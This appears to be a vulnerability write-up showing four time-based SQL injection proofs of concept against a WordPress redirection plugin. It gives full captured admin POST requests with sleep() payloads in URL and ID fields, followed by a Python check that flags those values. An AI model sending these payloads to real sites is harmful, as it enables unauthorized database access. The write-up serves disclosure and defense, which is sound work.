
SQL Injection 1
Capture the request sent when creating a redirection link and fill in the malicious payload.


POST /wp-admin/admin.php?page=all-in-one-redirection HTTP/1.1
Host: wordpress.test
Content-Length: 210
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wordpress.test/wp-admin/admin.php?page=all-in-one-redirection
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Ccef0b3e3f87cf120efd238fa3a5d2ca81704c051091a21d49f58171562b7b339; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Cfdde934010ea17942d46aee8d86f1d5cadc905bcdd0c36e1eade1d5cb4f99394; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1693276904; tk_ai=woo%3AO5PjapqxyYbqS9W4ECuuo%2BUc
Connection: close

redirection_type=302&source_url_insert=%2ftest.html'%2b(select*from(select(sleep(10)))a)%2b'&destination_url_insert=http%3A%2F%2Fwprdpress.test%2F1&insert-nonce=1a56d44bb5&insert_redirection_btn=Add+Redirection

The server is successfully made to sleep for ten seconds.


SQL Injection 2
Select the created link, click Delete, and capture the request.


With the payload modified, the server is successfully made to sleep:
POST /wp-admin/admin.php?page=all-in-one-redirection HTTP/1.1
Host: wordpress.test
Content-Length: 230
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wordpress.test/wp-admin/admin.php?page=all-in-one-redirection
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Ccef0b3e3f87cf120efd238fa3a5d2ca81704c051091a21d49f58171562b7b339; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Cfdde934010ea17942d46aee8d86f1d5cadc905bcdd0c36e1eade1d5cb4f99394; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1693276904; tk_ai=woo%3AO5PjapqxyYbqS9W4ECuuo%2BUc;XDEBUG_SESSION=PHPSTORM
Connection: close

check_delete_btns%5B%5D=(sleep(5))&redirection_id%5B%5D=1&redirection_type%5B%5D=302&source_url%5B%5D=%2Ftest.html&destination_url%5B%5D=http%3A%2F%2Fwprdpress.test%2F1&redirection-list-nonce=9962d7976f&delete_selected_list=Delete

SQL Injection 3
Delete a 404 page.

Modify the request:

POST /wp-admin/admin.php?page=all-in-one-redirection-404-pages-list HTTP/1.1
Host: wordpress.test
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wordpress.test/wp-admin/admin.php?page=all-in-one-redirection-404-pages-list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Ccef0b3e3f87cf120efd238fa3a5d2ca81704c051091a21d49f58171562b7b339; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Cfdde934010ea17942d46aee8d86f1d5cadc905bcdd0c36e1eade1d5cb4f99394; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1693276904; tk_ai=woo%3AO5PjapqxyYbqS9W4ECuuo%2BUc
Connection: close

check_404_page_delete_btns%5B%5D=sleep(5)&delete-404-page-nonce=c14f968bba&delete-404-pages=Delete

SQL Injection 4

POST /wp-admin/admin.php?page=all-in-one-redirection-404-pages-list HTTP/1.1
Host: wordpress.test
Content-Length: 244
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wordpress.test/wp-admin/admin.php?page=all-in-one-redirection-404-pages-list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Ccef0b3e3f87cf120efd238fa3a5d2ca81704c051091a21d49f58171562b7b339; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Cfdde934010ea17942d46aee8d86f1d5cadc905bcdd0c36e1eade1d5cb4f99394; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1693276904; tk_ai=woo%3AO5PjapqxyYbqS9W4ECuuo%2BUc
Connection: close

redirection_type=301&source_url_insert=%2Fwp-admin%2F'%2b(select*from(select(sleep(10)))a)%2b'&destination_url_insert=http%3A%2F%2Fwprdpress.test%2F1&insert-404-page-nonce=3fb7b98deb&page_404_id=5&insert_404_page_redirection_btn=Add+Redirection
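
The four requests above use two injection contexts: a quote breakout in the source URL field (1 and 4) and a bare expression in a field that should hold a numeric ID (2 and 3). As an added example (not code from this write-up or from the plugin), the Python below decodes each request body and flags the values that fail a strict per-field type check; the field rules are assumptions inferred from the requests shown here. Such a check is defense in depth for review or log triage, while the actual fix is a parameterized query (`$wpdb->prepare()` in WordPress).

```python
import re
from urllib.parse import parse_qsl

# Assumed field rules, inferred from the request bodies on this page
# (not taken from the plugin's source code).
INT_FIELDS = {"check_delete_btns[]", "redirection_id[]", "redirection_type",
              "redirection_type[]", "check_404_page_delete_btns[]", "page_404_id"}
PATH_FIELDS = {"source_url_insert", "source_url[]"}
INT_RE = re.compile(r"\d{1,10}")             # plain decimal ID or status code
PATH_RE = re.compile(r"/[A-Za-z0-9._~/-]*")  # site-relative path, no quotes/parens


def audit_form_body(body):
    """Return [(field, decoded_value)] for each value that breaks its rule."""
    violations = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in INT_FIELDS and not INT_RE.fullmatch(value):
            violations.append((name, value))
        elif name in PATH_FIELDS and not PATH_RE.fullmatch(value):
            violations.append((name, value))
    return violations


# Bodies of the four requests shown above, in order.
BODIES = [
    "redirection_type=302&source_url_insert=%2ftest.html'%2b(select*from(select(sleep(10)))a)%2b'&destination_url_insert=http%3A%2F%2Fwprdpress.test%2F1&insert-nonce=1a56d44bb5&insert_redirection_btn=Add+Redirection",
    "check_delete_btns%5B%5D=(sleep(5))&redirection_id%5B%5D=1&redirection_type%5B%5D=302&source_url%5B%5D=%2Ftest.html&destination_url%5B%5D=http%3A%2F%2Fwprdpress.test%2F1&redirection-list-nonce=9962d7976f&delete_selected_list=Delete",
    "check_404_page_delete_btns%5B%5D=sleep(5)&delete-404-page-nonce=c14f968bba&delete-404-pages=Delete",
    "redirection_type=301&source_url_insert=%2Fwp-admin%2F'%2b(select*from(select(sleep(10)))a)%2b'&destination_url_insert=http%3A%2F%2Fwprdpress.test%2F1&insert-404-page-nonce=3fb7b98deb&page_404_id=5&insert_404_page_redirection_btn=Add+Redirection",
]
# Constructed benign request for comparison (not from the page).
CLEAN_BODY = "redirection_type=302&source_url_insert=%2Ftest.html&destination_url_insert=http%3A%2F%2Fwordpress.test%2F1"

if __name__ == "__main__":
    for number, body in enumerate(BODIES, start=1):
        print(f"SQL Injection {number}:", audit_form_body(body))
    print("Clean request:", audit_form_body(CLEAN_BODY))
```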

